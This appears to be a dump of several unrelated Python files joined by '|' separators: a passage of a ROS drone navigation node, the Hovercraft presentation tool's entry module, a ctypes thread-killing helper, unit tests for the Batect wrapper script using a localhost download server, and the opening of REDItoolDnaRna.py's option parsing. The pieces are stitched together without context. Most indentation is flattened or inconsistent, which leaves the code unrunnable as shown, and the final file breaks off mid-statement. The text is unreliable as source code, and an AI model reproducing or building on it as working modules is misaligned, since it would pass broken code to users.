# This is the place where you modify path planner
t1 = time.time()
self.set_status(status.LOOKING_FOR_PATH)
print("start and end are: ", self.get_local_pose_d(), end_pos)
temp_obs = self.driver.get_obstacles_around()
                if temp_obs is not None:
                    _, self.path = self.rs.find_path(pose_d=self.get_local_pose_d(), target_pose_d=end_pos, obstacle_3d=temp_obs)
t2 = time.time()
print('random sampling path finding time cost:', (t2 - t1))
                if not self.path:
                    self.set_status(status.LOOKING_FOR_PATH_FAILED)
                    print('No path found! self.path is empty')
time.sleep(0.05)
                else:
                    # Path found. Keep the state machine going and execute the task step by step.
                    self.set_status(status.LOOKING_FOR_PATH_SUCCEED)
                    print("Path found!")
                    # In practice, transform the path from the Gazebo frame to the ENU frame.
                    print("self.path before: ", self.path)
                    self.path = self.path_in_gazebo_frame_to_enu_frame(self.path)
                    print("self.path after: ", self.path)
self.publish_path(self.path, (1, 0, 0))
# save obstacle points
if (self.save_pts):
self.driver.get_obstacles_around()
# going through each waypoint
for next_move in self.path:
if self.navi_task_terminated():
break
print('next_move : ', next_move)
# if not self.driver.algo.is_valid(next_move, self.driver.get_obstacles_around()):
# print('Next waypoint is in collision with obstacle, path not valid!')
# break
next_position_continuous = self.dg.discrete_to_continuous_target(next_move)
print("local pose: ", self.local_pose_c)
print("target pose: ", next_position_continuous)
while not self.reachTargetPositionContinuous(next_position_continuous, 0.5):
self.controller.mav_move(next_position_continuous[0],
next_position_continuous[1],
next_position_continuous[2],
abs_mode=True)
time.sleep(0.05)
print("Target Reached!")
time.sleep(0.05) # wait for new nav task.
print("Mavros not in OFFBOARD mode, Disconnected!")
'''
move quad in body frame
'''
def terminate_navigating(self):
#TODO
pass
def resume_navigating(self):
#TODO
pass
def set_target_position(self, target_position):
        if target_position and len(target_position) == 3:
self.cur_target_position = self.dg.continuous_to_discrete(target_position)
def get_latest_target(self):
return self.cur_target_position
def set_vision_target(self, vision_target):
self.set_status(status.GOING_TO_VISION_TARGET)
self.set_target_position(vision_target)
    def navi_task_terminated(self):
        # dist() returns (valid, squared L2 distance); an invalid pose pair
        # means the task cannot be considered terminated yet.
        valid, squared_distance = self.dist(self.local_pose_d, self.cur_target_position)
        return valid and squared_distance < 2  # TODO: or stop flag is set.
'''
Dstar Thread
def Dstar_thread(self):
while not rospy.is_shutdown():
while status!= xxx:# TODO
next_move = xxx
return next_move'''
'''##For test:
target = [0.5, 0.5, 0.5]
self.set_target_postion(target)
pass'''
'''
ROS thread
responsible for subscribers and publishers
'''
def ros_thread(self):
print('ros_thread spawn!!!!')
self.octomap_msg = None
# subscribers
self.slam_sub = rospy.Subscriber("/gi/slam_output/pose", PoseStamped, self.slam_pose_callback)
self.vision_target_sub = rospy.Subscriber("/gi/visual_target/pose", PoseStamped, self.vision_target_callback)
self.point_cloud_sub = rospy.Subscriber("/camera/left/point_cloud", PointCloud, self.point_cloud_callback)
self.octomap_cells_vis = rospy.Subscriber("/octomap_point_cloud_centers", PointCloud2, self.octomap_update_callback)
self.local_pose_sub = rospy.Subscriber("/mavros/local_position/pose", PoseStamped, self.local_pose_callback)
self.mavros_sub = rospy.Subscriber("/mavros/state", State, self.mavros_state_callback)
# publishers
#self.mavros_control_pub = rospy.Publisher('mavros/Command', Command, queue_size=10)
self.set_status(status.INITIALIZED)
rospy.spin()
'''
ROS callbacks
'''
def slam_pose_callback(self, msg):
self.slam_pose = msg
def vision_target_callback(self, msg):
self.vision_target = msg
#print("Received New Vision Target!")
def mavros_state_callback(self, msg):
self.mavros_state = msg.mode
self.navigator_status_pub.publish(self.STATUS)
def point_cloud_callback(self, msg):
self.current_point_cloud = msg
def octomap_update_callback(self, msg): # as pointcloud2.
obs_set = set()
for p in pc2.read_points(msg, field_names=("x", "y", "z"), skip_nans=True):
#print " x : %f y: %f z: %f" % (p[0], p[1], p[2])
point = self.dg.continuous_to_discrete((p[0], p[1], p[2]))
#print("corresponding discrete value: ", point)
obs_set.add(point)
acquired = self.obstacle_set_mutex.acquire(True) # blocking.
if acquired:
#print('octomap updated!')
self.driver.set_obstacle_set(obs_set)
self.obstacle_set_mutex.release()
return
else:
print('Lock not acquired!')
def local_pose_callback(self, msg):
pose_ = msg.pose.position #TODO:do fusion with visual slam.
self.local_pose_c = (pose_.x, pose_.y, pose_.z)
self.local_pose_d = self.dg.continuous_to_discrete((pose_.x, pose_.y, pose_.z))
# return pose in discrete
def get_local_pose_d(self): # in mavros axis.for command.
return self.local_pose_d
# return pose in continuous
def get_local_pose_c(self):
return self.local_pose_c
'''
helper functions
'''
def set_status(self, status):
self.STATUS = String(status.name)
    def dist(self, pos1, pos2):
        # Returns (valid, squared Euclidean distance). No square root is taken,
        # so callers must compare against squared thresholds.
        if not pos1 or not pos2:
            return False, 0
        return True, sum((pos1[i] - pos2[i]) ** 2 for i in range(3))
# target should be Continuous
def reachTargetPositionContinuous(self, target, threshold=0.7):
delta_x = math.fabs(self.local_pose_c[0] - target[0])
delta_y = math.fabs(self.local_pose_c[1] - target[1])
delta_z = math.fabs(self.local_pose_c[2] - target[2])
        distance = delta_x + delta_y + delta_z
        print("distance: ", distance, "threshold: ", threshold)
        return distance < threshold
# target should be discrete
def reachTargetPositionDiscrete(self, target, threshold=3):
delta_x = math.fabs(self.local_pose_d[0] - target[0])
delta_y = math.fabs(self.local_pose_d[1] - target[1])
delta_z = math.fabs(self.local_pose_d[2] - target[2])
        distance = delta_x + delta_y + delta_z
        print("distance: ", distance, "threshold: ", threshold)
        return distance < threshold
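    # Note: both reach checks above use the L1 (Manhattan) sum of per-axis
    # deltas rather than the Euclidean distance, so the thresholds are L1 radii
    # (meters for the continuous variant, grid cells for the discrete one).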
def setMavMode(self, msg):
pass
def do_hover(self):
pass
def publish_path(self, path, RGB=(1, 0, 0)):
m_arr = MarkerArray()
marr_index = 0
for next_move in path:
print "publish_path, path len: ", len(path), next_move
point = self.dg.discrete_to_continuous_target((next_move[0], next_move[1], next_move[2]))
mk = Marker()
mk.header.frame_id = "map"
mk.action = mk.ADD
mk.id = marr_index
marr_index += 1
mk.color.r = RGB[0]
mk.color.g = RGB[1]
mk.color.b = RGB[2]
mk.color.a = 1.0
mk.type = mk.CUBE
mk.scale.x = 0.3
mk.scale.y = 0.3
mk.scale.z = 0.3
mk.pose.position.x = point[0]
mk.pose.position.y = point[1]
mk.pose.position.z = point[2]
m_arr.markers.append(mk)
self.path_plan_pub.publish(m_arr)
if __name__ == '__main__':
nav = Navigator(True)
    # target position is specified in meters
nav.set_target_position((0, -3, 1))
nav.keep_navigating()
|
__init__.py
|
import argparse
import gettext
import os
import threading
import time
import pkg_resources
from collections import defaultdict
from http.server import HTTPServer, SimpleHTTPRequestHandler
from tempfile import TemporaryDirectory
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
from .generate import generate
__version__ = pkg_resources.require("hovercraft")[0].version
class HovercraftEventHandler(FileSystemEventHandler):
def __init__(self, filelist):
self.filelist = filelist
self.quit = False
super().__init__()
def on_modified(self, event):
self._update(event.src_path)
def on_created(self, event):
self._update(event.src_path)
def on_moved(self, event):
self._update(event.dest_path)
def _update(self, src_path):
if self.quit:
return
if src_path in self.filelist:
print("File %s modified, update presentation" % src_path)
self.quit = True
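# generate_and_observe() below regenerates the presentation in a loop: each pass
# runs generate(), watches the files it reported via watchdog, and starts a new
# pass as soon as one of them changes. Clearing the event (done by the serving
# code on shutdown) ends the loop.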
def generate_and_observe(args, event):
    while event.is_set():
# Generate the presentation
monitor_list = generate(args)
print("Presentation generated.")
# Make a list of involved directories
directories = defaultdict(list)
for file in monitor_list:
directory, filename = os.path.split(file)
directories[directory].append(filename)
observer = Observer()
handler = HovercraftEventHandler(monitor_list)
for directory, files in directories.items():
observer.schedule(handler, directory, recursive=False)
observer.start()
while event.wait(1):
time.sleep(0.05)
if handler.quit:
break
observer.stop()
observer.join()
def main(args=None):
parser = create_arg_parser()
args = parser.parse_args(args=args)
serve_presentation(args)
def create_arg_parser():
# That the argparse default strings are lowercase is ugly.
def my_gettext(s):
return s.capitalize()
gettext.gettext = my_gettext
parser = argparse.ArgumentParser(
description="Create impress.js presentations with reStructuredText",
add_help=False,
)
parser.add_argument(
"presentation",
metavar="<presentation>",
help="The path to the reStructuredText presentation file.",
)
parser.add_argument(
"targetdir",
metavar="<targetdir>",
nargs="?",
help=(
"The directory where the presentation is saved. Will be created "
"if it does not exist. If you do not specify a targetdir "
"Hovercraft! will instead start a webserver and serve the "
"presentation from that server."
),
)
parser.add_argument("-h", "--help", action="help", help="Show this help.")
parser.add_argument(
"-t",
"--template",
help=(
"Specify a template. Must be a .cfg file, or a directory with a "
"template.cfg file. If not given it will use a default template."
),
)
parser.add_argument(
"-c",
"--css",
help=(
"An additional css file for the presentation to use. "
"See also the ``:css:`` settings of the presentation."
),
)
parser.add_argument(
"-j",
"--js",
help=(
"An additional javascript file for the presentation to use. Added as a js-body script."
"See also the ``:js-body:`` settings of the presentation."
),
)
parser.add_argument(
"-a",
"--auto-console",
action="store_true",
help=(
"Open the presenter console automatically. This is useful when "
"you are rehearsing and making sure the presenter notes are "
"correct. You can also set this by having ``:auto-console: "
"true`` first in the presentation."
),
)
parser.add_argument(
"-s",
"--skip-help",
action="store_true",
help=("Do not show the initial help popup."),
)
parser.add_argument(
"-n",
"--skip-notes",
action="store_true",
help=("Do not include presenter notes in the output."),
)
parser.add_argument(
"-p",
"--port",
default="0.0.0.0:8000",
help=(
"The address and port that the server uses. "
"Ex 8080 or 127.0.0.1:9000. Defaults to 0.0.0.0:8000."
),
)
parser.add_argument(
"--mathjax",
default=os.environ.get(
"HOVERCRAFT_MATHJAX",
"https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML",
),
help=(
"The URL to the mathjax library."
" (It will only be used if you have rST ``math::`` in your document)"
),
)
parser.add_argument(
"-N",
"--slide-numbers",
action="store_true",
help=("Show slide numbers during the presentation."),
)
parser.add_argument(
"-v",
"--version",
action="version",
# help=('Display version and exit.'),
version="Hovercraft! %s" % __version__,
)
return parser
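# Typical invocations (illustrative): "hovercraft presentation.rst" serves the
# presentation over HTTP on 0.0.0.0:8000, while "hovercraft presentation.rst
# outdir" writes the generated files to outdir instead of starting a server.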
def serve_presentation(args):
# XXX Bit of a hack, clean this up, I check for this twice, also in the template.
if args.template and args.template not in ("simple", "default"):
args.template = os.path.abspath(args.template)
if args.targetdir:
# Generate the presentation
generate(args)
else:
# Server mode. Start a server that serves a temporary directory.
with TemporaryDirectory() as targetdir:
args.targetdir = targetdir
args.presentation = os.path.abspath(args.presentation)
# Set up watchdog to regenerate presentation if saved.
event = threading.Event()
event.set()
thread = threading.Thread(target=generate_and_observe, args=(args, event))
try:
# Serve presentation
if ":" in args.port:
bind, port = args.port.split(":")
else:
bind, port = "0.0.0.0", args.port
port = int(port)
# First create the server. This checks that we can connect to
# the port we want to.
os.chdir(targetdir)
server = HTTPServer((bind, port), SimpleHTTPRequestHandler)
print("Serving HTTP on", bind, "port", port, "...")
try:
# Now generate the presentation
thread.start()
try:
# All is good, start the server
server.serve_forever()
except KeyboardInterrupt:
print("\nKeyboard interrupt received, exiting.")
finally:
# Server exited
server.server_close()
finally:
# Stop the generation thread
event.clear()
# Wait for it to end
thread.join()
except PermissionError:
print("Can't bind to port %s:%s: No permission" % (bind, port))
except OSError as e:
if e.errno == 98:
print(
"Can't bind to port %s:%s: port already in use" % (bind, port)
)
else:
raise
|
kill_thread.py
|
import threading
import time
import inspect
import ctypes
__all__ = ['stop_thread']
def _async_raise(tid, exctype):
"""raises the exception, performs cleanup if needed"""
tid = ctypes.c_long(tid)
if not inspect.isclass(exctype):
exctype = type(exctype)
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(
tid, ctypes.py_object(exctype))
if res == 0:
raise ValueError("invalid thread id")
elif res != 1:
# """if it returns a number greater than one, you're in trouble,
# and you should call it again with exc=NULL to revert the effect"""
ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)
raise SystemError("PyThreadState_SetAsyncExc failed")
def stop_thread(thread):
_async_raise(thread.ident, SystemExit)
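# Caveat: PyThreadState_SetAsyncExc only delivers the exception the next time
# the target thread executes Python bytecode, so a thread blocked in a long
# native call (e.g. C extension I/O) is not interrupted until that call returns.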
def test():
while True:
print('-------')
time.sleep(0.5)
if __name__ == "__main__":
t = threading.Thread(target=test)
t.start()
time.sleep(5.2)
print("main thread sleep finish")
stop_thread(t)
|
tests.py
|
#! /usr/bin/env python3
import hashlib
import http.server
import os
import shutil
import socket
import subprocess
import tempfile
import threading
import unittest
class WrapperScriptTests(unittest.TestCase):
http_port = 8080
default_bash = "/usr/bin/bash"
minimum_script_dependencies = [
"/usr/bin/basename",
"/usr/bin/cut",
"/usr/bin/dirname",
"/usr/bin/grep",
"/usr/bin/head",
"/usr/bin/mkdir",
"/usr/bin/mktemp",
"/usr/bin/mv",
"/usr/bin/sed",
"/usr/bin/sha256sum",
"/usr/bin/uname",
]
minimum_script_dependencies_with_default_bash = minimum_script_dependencies + [default_bash]
def setUp(self):
self.start_server()
self.cache_dir = tempfile.mkdtemp()
def tearDown(self):
self.stop_server()
shutil.rmtree(self.cache_dir)
def download_url(self, path):
return "http://localhost:" + str(self.http_port) + "/test/" + path
def default_download_url(self):
return self.download_url("testapp.jar")
def test_first_run(self):
result = self.run_script(["arg 1", "arg 2"])
output = result.stdout.decode()
self.assertIn("Downloading Batect", output)
self.assertIn("BATECT_WRAPPER_SCRIPT_DIR is: {}\n".format(self.get_script_dir()), output)
self.assertIn("BATECT_WRAPPER_CACHE_DIR is: {}\n".format(self.cache_dir), output)
self.assertIn("HOSTNAME is: {}\n".format(socket.gethostname()), output)
self.assertIn("I received 2 arguments.\narg 1\narg 2\n", output)
self.assertEqual(result.returncode, 0)
def test_second_run(self):
first_result = self.run_script(["arg 1", "arg 2"])
first_output = first_result.stdout.decode()
self.assertIn("Downloading Batect", first_output)
self.assertIn("BATECT_WRAPPER_SCRIPT_DIR is: {}\n".format(self.get_script_dir()), first_output)
self.assertIn("BATECT_WRAPPER_CACHE_DIR is: {}\n".format(self.cache_dir), first_output)
self.assertIn("BATECT_WRAPPER_DID_DOWNLOAD is: true\n", first_output)
self.assertIn("HOSTNAME is: {}\n".format(socket.gethostname()), first_output)
self.assertIn("I received 2 arguments.\narg 1\narg 2\n", first_output)
self.assertEqual(first_result.returncode, 0)
second_result = self.run_script(["arg 3", "arg 4"])
second_output = second_result.stdout.decode()
self.assertNotIn("Downloading Batect", second_output)
self.assertIn("BATECT_WRAPPER_SCRIPT_DIR is: {}\n".format(self.get_script_dir()), second_output)
self.assertIn("BATECT_WRAPPER_CACHE_DIR is: {}\n".format(self.cache_dir), second_output)
self.assertIn("BATECT_WRAPPER_DID_DOWNLOAD is: false\n", second_output)
self.assertIn("HOSTNAME is: {}\n".format(socket.gethostname()), second_output)
self.assertIn("I received 2 arguments.\narg 3\narg 4\n", second_output)
        self.assertEqual(second_result.returncode, 0)
def test_download_fails(self):
result = self.run_script(["arg 1", "arg 2"], download_url=self.download_url("does-not-exist"))
self.assertIn("Downloading Batect", result.stdout.decode())
self.assertIn("404 File not found", result.stdout.decode())
self.assertNotEqual(result.returncode, 0)
def test_download_is_not_quiet(self):
result = self.run_script([], quiet_download="false")
result_output = result.stdout.decode()
self.assertIn("Downloading Batect", result_output)
self.assertIn("BATECT_WRAPPER_SCRIPT_DIR is: {}\n".format(self.get_script_dir()), result_output)
self.assertIn("BATECT_WRAPPER_CACHE_DIR is: {}\n".format(self.cache_dir), result_output)
self.assertIn("HOSTNAME is: {}\n".format(socket.gethostname()), result_output)
self.assertIn("#", result_output)
self.assertEqual(result.returncode, 0)
def test_download_is_quiet(self):
result = self.run_script([], quiet_download="true")
result_output = result.stdout.decode()
self.assertNotIn("Downloading Batect", result_output)
self.assertIn("BATECT_WRAPPER_SCRIPT_DIR is: {}\n".format(self.get_script_dir()), result_output)
self.assertIn("BATECT_WRAPPER_CACHE_DIR is: {}\n".format(self.cache_dir), result_output)
self.assertIn("HOSTNAME is: {}\n".format(socket.gethostname()), result_output)
self.assertNotIn("#", result_output)
self.assertNotIn("Xferd", result_output)
self.assertEqual(result.returncode, 0)
def test_no_curl(self):
path_dir = self.create_limited_path(self.minimum_script_dependencies_with_default_bash)
result = self.run_script([], path=path_dir)
self.assertIn("curl is not installed or not on your PATH. Please install it and try again.", result.stdout.decode())
self.assertNotEqual(result.returncode, 0)
def test_no_java(self):
path_dir = self.create_limited_path(self.minimum_script_dependencies_with_default_bash + ["/usr/bin/curl"])
result = self.run_script([], path=path_dir)
self.assertIn("Java is not installed or not on your PATH. Please install it and try again.", result.stdout.decode())
self.assertNotEqual(result.returncode, 0)
def test_unsupported_java(self):
path_dir = self.create_limited_path_for_specific_java_version("7")
result = self.run_script([], path=path_dir)
self.assertIn("The version of Java that is available on your PATH is version 1.7, but version 1.8 or greater is required.\n" +
"If you have a newer version of Java installed, please make sure your PATH is set correctly.", result.stdout.decode())
self.assertNotEqual(result.returncode, 0)
def test_32bit_java(self):
path_dir = self.create_limited_path_for_specific_java("fake-32-bit")
result = self.run_script([], path=path_dir)
self.assertIn("The version of Java that is available on your PATH is a 32-bit version, but Batect requires a 64-bit Java runtime.\n" +
"If you have a 64-bit version of Java installed, please make sure your PATH is set correctly.", result.stdout.decode())
self.assertNotEqual(result.returncode, 0)
def test_mac_placeholder_java(self):
path_dir = self.create_limited_path_for_specific_java("fake-mac-placeholder")
result = self.run_script([], path=path_dir)
self.assertIn("Java is not installed or not on your PATH. Please install it and try again.", result.stdout.decode())
self.assertNotEqual(result.returncode, 0)
def test_supported_java(self):
for version in ["8", "9", "10", "11"]:
with self.subTest(java_version=version):
path_dir = self.create_limited_path_for_specific_java_version(version)
result = self.run_script([], path=path_dir)
self.assertIn("The Java application has started.", result.stdout.decode())
self.assertEqual(result.returncode, 0)
def test_supported_java_with_tool_options_set(self):
path_dir = self.create_limited_path_for_specific_java_version("8")
result = self.run_script([], path=path_dir, with_java_tool_options="true")
self.assertIn("The Java application has started.", result.stdout.decode())
self.assertEqual(result.returncode, 0)
# macOS ships with Bash 3.2, so we need to make sure the wrapper works with that.
def test_supported_java_with_old_bash(self):
path_dir = self.create_limited_path_for_specific_java_version("8", bash="/shells/bash-3.2/bin/bash")
result = self.run_script([], path=path_dir)
self.assertIn("The Java application has started.", result.stdout.decode())
self.assertEqual(result.returncode, 0)
def test_non_zero_exit(self):
result = self.run_script(["exit-non-zero"])
output = result.stdout.decode()
self.assertIn("The Java application has started.", output)
self.assertNotIn("WARNING: you should never see this", output)
self.assertEqual(result.returncode, 123)
def test_corrupt_download(self):
result = self.run_script([], download_url=self.download_url("brokenapp.txt"))
output = result.stdout.decode()
self.assertRegex(output, "The downloaded version of Batect does not have the expected checksum. Delete '.*' and then re-run this script to download it again.")
self.assertNotIn("The Java application has started.", output)
self.assertNotEqual(result.returncode, 0)
def test_corrupt_cached_version(self):
result_for_initial_download = self.run_script([])
self.assertEqual(result_for_initial_download.returncode, 0)
self.corrupt_cached_file()
result_after_corruption = self.run_script([])
output = result_after_corruption.stdout.decode()
self.assertRegex(output, "The downloaded version of Batect does not have the expected checksum. Delete '.*' and then re-run this script to download it again.")
self.assertNotIn("The Java application has started.", output)
self.assertNotEqual(result_after_corruption.returncode, 0)
def corrupt_cached_file(self):
with open(self.cache_dir + "/VERSION-GOES-HERE/batect-VERSION-GOES-HERE.jar", "a+") as f:
f.truncate(10)
def create_limited_path_for_specific_java_version(self, java_version, bash=default_bash):
return self.create_limited_path_for_specific_java("java-{}-openjdk-amd64".format(java_version), bash)
def create_limited_path_for_specific_java(self, java_name, bash=default_bash):
return self.create_limited_path(self.minimum_script_dependencies +
[
bash,
"/usr/bin/curl",
"/usr/lib/jvm/{}/bin/java".format(java_name),
])
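    # Build a temporary directory containing symlinks to only the given
    # executables and return its path; using it as PATH lets a test hide
    # tools such as curl or java from the wrapper script under test.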
def create_limited_path(self, executables):
path_dir = tempfile.mkdtemp()
self.addCleanup(lambda: shutil.rmtree(path_dir))
for executable in executables:
base_name = os.path.basename(executable)
os.symlink(executable, os.path.join(path_dir, base_name))
return path_dir
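    # The wrapper script is driven entirely through BATECT_* environment
    # variables, so each test overrides the cache dir, download URL,
    # checksum and PATH instead of patching the script itself.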
def run_script(self, args, download_url=None, path=os.environ["PATH"], quiet_download=None, with_java_tool_options=None):
if download_url is None:
download_url = self.default_download_url()
env = {
"BATECT_CACHE_DIR": self.cache_dir,
"BATECT_DOWNLOAD_URL": download_url,
"BATECT_DOWNLOAD_CHECKSUM": self.get_checksum_of_test_app(),
"PATH": path
}
if quiet_download is not None:
env["BATECT_QUIET_DOWNLOAD"] = quiet_download
if with_java_tool_options is not None:
env["JAVA_TOOL_OPTIONS"] = "-XX:+UnlockExperimentalVMOptions -XX:+UseCGroupMemoryLimitForHeap"
        script_path = self.get_script_path()
        command = [script_path] + args
return subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env)
def get_checksum_of_test_app(self):
with open("test/testapp.jar", "rb") as f:
            contents = f.read()
        return hashlib.sha256(contents).hexdigest()
def get_script_dir(self):
return os.path.abspath(os.path.join(os.path.dirname(os.path.realpath(__file__)), "..", "src"))
def get_script_path(self):
return os.path.join(self.get_script_dir(), "template.sh")
def start_server(self):
self.server = http.server.HTTPServer(("", self.http_port), QuietHTTPHandler)
threading.Thread(target=self.server.serve_forever, daemon=True).start()
def stop_server(self):
self.server.shutdown()
self.server.server_close()
class QuietHTTPHandler(http.server.SimpleHTTPRequestHandler):
def log_message(self, format, *args):
pass
if __name__ == '__main__':
unittest.main()
|
REDItoolDnaRna.py
|
#!/home/epicardi/bin/python27/bin/python
# Copyright (c) 2013-2014 Ernesto Picardi <ernesto.picardi@uniba.it>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import sys, os, time, math, random, getopt, operator, string, errno
try: import pysam
except: sys.exit('Pysam module not found.')
from multiprocessing import Process, Queue
from Queue import Empty
import gzip
pysamVersion=pysam.__version__
sys.stderr.write('Pysam version used: %s\n' %(pysamVersion))
version='1.3'
pid=str(os.getpid()+random.randint(0,999999999))
def usage():
print """
USAGE: python REDItoolDnaRna.py [options]
Options:
-i RNA-Seq BAM file
-j DNA-Seq BAM file(s separated by comma) or folder
-I Sort input RNA-Seq BAM file
-J Sort input DNA-Seq BAM file
-f Reference in fasta file
-C Base interval to explore [100000]
-k List of chromosomes to skip separated by comma or file
-t Number of threads [1]
-Y Work Only On Region: chrxx:start-end (positions are distributed by the number of threads)
-o Output folder [rediFolder_%s]
-F Internal folder name [null]
-M Save a list of columns with quality scores
-c Min. read coverage (dna,rna) [10,10]
-q Min. quality score (dna,rna) [30,30]
-m Min. mapping quality score (dna,rna) [30,30]*
-O Min. homopolymeric length (dna,rna) [5,5]
-s Infer strand (for strand oriented reads) [1]
-g Strand inference type 1:maxValue 2:useConfidence [1]
-x Strand confidence [0.70]
-S Strand correction
-G Infer strand by GFF annotation (must be GFF and sorted, otherwise use -X)
-K GFF File with positions to exclude (must be GFF and sorted, otherwise use -X)
-T Work only on given GFF positions (must be GFF and sorted, otherwise use -X)
-X Sort annotation files
-e Exclude multi hits in RNA-Seq
-E Exclude multi hits in DNA-Seq
-d Exclude duplicates in RNA-Seq
-D Exclude duplicates in DNA-Seq
-p Use paired concordant reads only in RNA-Seq
-P Use paired concordant reads only in DNA-Seq
-u Consider mapping quality in RNA-Seq
-U Consider mapping quality in DNA-Seq
-a Trim x bases up and y bases down per read [0-0] in RNA-Seq
-A Trim x bases up and y bases down per read [0-0] in DNA-Seq
-b Blat file for correction in RNA-Seq
-B Blat file for correction in DNA-Seq
-l Remove substitutions in homopolymeric regions in RNA-Seq
-L Remove substitutions in homopolymeric regions in DNA-Seq
-v Min. num. of reads supporting the variation [3] for RNA-Seq
-n Min. editing frequency [0.1] for RNA-Seq
-N Min. variation frequency [0.1] for DNA-Seq
-z Exclude positions with multiple changes in RNA-Seq
-Z Exclude positions with multiple changes in DNA-Seq
-W Select RNA-Seq positions with defined changes (separated by comma ex: AG,TC) [default all]
-R Exclude invariant RNA-Seq positions
-V Exclude sites not supported by DNA-Seq
-w File containing splice sites annotations
-r Num. of bases near splice sites to explore [4]
-H No Table Header
--gzip Gzip output files
-h Print this help
--help
--reads Get reads containing reference mismatches
--addP Extract reads alignments with reference mismatches in bed3 format, it requires --reads
--rmIndels Remove positions with Indels in surrounding 5 bases
*This value may change according to the aligner:
- For Bowtie use 255
- For Bowtie2 use 40
- For BWA use 30
- For RNA-STAR use 255
- For HiSAT2 use 60
- For Tophat1 use 255
- For Tophat2 use 50
- For GSNAP use 30
"""%(pid)
#option --fastq Fastq to get reads [requires --reads], separated by comma [if paired] NOT IMPLEMENTED
#option --rmOver Remove overlapping reads NOT IMPLEMENTED
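# A typical invocation might look like the following (hypothetical file
# names, shown only for illustration; option values follow the dna,rna
# order documented in the usage above):
#   python REDItoolDnaRna.py -i rna.bam -j dna.bam -f hg19.fa -o outdir -t 4 -c 10,10 -q 30,30 -m 30,255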
try:
opts, args = getopt.getopt(sys.argv[1:], "i:f:k:t:o:c:q:m:O:s:edpuA:a:B:b:lLv:n:EPr:hHIXG:K:j:C:JDUzw:N:ZW:RVMT:F:x:g:SY:",["help","gzip","reads","addP","rmIndels"])
except getopt.GetoptError as err:
print str(err) # will print something like "option -a not recognized"
usage()
sys.exit(2)
MAX_DEPTH=100000
strconf=0.70 # strand confidence
useconf=0
corrstr=0
bamfile=''
gbamfile=[]
dgbamfile={} # dictionary of gbamfile
fastafile=''
sortbam=0
sortgbam=0
nochrs=[]
NCPU=1
infolder=''
outfolder_='rediFolder_%s' %(pid)
MINCOV=10
QVAL=33 #NOT USED
MQUAL=30
MAPQ=30
homo=5
rmpv = '0-0'
rmp = [int(x) for x in rmpv.split('-')]
getstrand=0 # consider the strand
exh=0 # exclude multi hits
exd=0 # exclude duplicates
conc=0 # if paired-end reads are present, use only concordant pairs
mq=0 # consider mapping quality
rmnuc=0 # trim bases at read ends; tied to rmp and rmpv
blatr=0 # apply the Blat correction
blatfolder=''
rmsh=0 # remove substitutions in homopolymers of length >= homo
vnuc=3 # min number of reads supporting the variation
mmf=0.1 # min variation frequency
exms=0 # exclude multiple substitutions
exss=0 # exclude intronic positions within nss nucleotides of splice sites
nss=4 # intronic bases to explore for each splice site
splicefile='' #'splicesites.hg18.sorted.txt'
usubs=[x+y for x in 'ACGT' for y in 'ACGT' if x!=y] # use these substitutions [default all]
annfile='' # use annotation file for strand correction and features
sortann=0 # sort annotation file
uann=0 # use annotation
exfile='' # use annotations to exclude positions
expos=0 #
chunckval=100000
exinv=0
slist=0
slistfile=''
gslistfile=''
wfile='' # working file. GFF annotations to use
uwf=0 # use working file
workR=('',[0,0]) # specific working region
fworkR=0
rmOver=0
rmIndel=0
###########################
# for DNA-Seq
###########################
gMINCOV=10
gQVAL=33 #NOT USED
gMQUAL=30
gMAPQ=30
ghomo=5
grmpv = '0-0'
grmp = [int(x) for x in grmpv.split('-')]
gexh=0 # exclude multi hits
gexd=0 # exclude duplicates
gconc=0 # if paired-end reads are present, use only concordant pairs
gmq=0 # consider mapping quality
grmnuc=0 # trim bases at read ends; tied to grmp and grmpv
gblatr=0 # apply the Blat correction
gblatfolder=''
grmsh=0 # remove substitutions in homopolymers of length >= ghomo
gmmf=0.1 # min variation frequency
exnonh=0 # exclude non-homozygous positions
exnosupp=0 # exclude positions not supported by DNA-Seq
nogbam=0 # set to 1 when no DNA-Seq BAM is available
unchange1=1
unchange2=0
gziptab=0
greads=0
fastq=''
addP=0
noheader=0
for o, a in opts:
if o in ("-h","--help"):
usage()
sys.exit()
elif o == "-H": noheader=1
elif o == "-i": bamfile=a
elif o == "-j":
if os.path.isdir(a): gbamfile=[(os.path.join(a,x),0) for x in os.listdir(a) if x[-4:]=='.bam']
else: gbamfile=[(x,0) for x in a.split(',') if x.strip()!='']
dgbamfile=dict(gbamfile)
elif o == "-f": fastafile=a
elif o == "-k":
if os.path.exists(a):
f=open(a)
nochrs=[x.strip() for x in f if x.strip()!='']
f.close()
else: nochrs = a.split(',')
elif o == "-t": NCPU=int(a)
elif o == "-F": infolder=a
elif o == "-o": outfolder_=a
elif o == "-c":
MINCOV=int(a.split(',')[1])
gMINCOV=int(a.split(',')[0])
# elif o == "-Q":
# QVAL=int(a.split(',')[1])
# gQVAL=int(a.split(',')[0])
elif o == "-q":
MQUAL=int(a.split(',')[1])
gMQUAL=int(a.split(',')[0])
elif o == "-m":
MAPQ=int(a.split(',')[1])
gMAPQ=int(a.split(',')[0])
elif o == "-O":
homo=int(a.split(',')[1])
ghomo=int(a.split(',')[0])
elif o == "-S": corrstr=1
elif o == "-x": strconf=float(a)
elif o == "-g":
if a=='2': useconf=1
elif o == "-s":
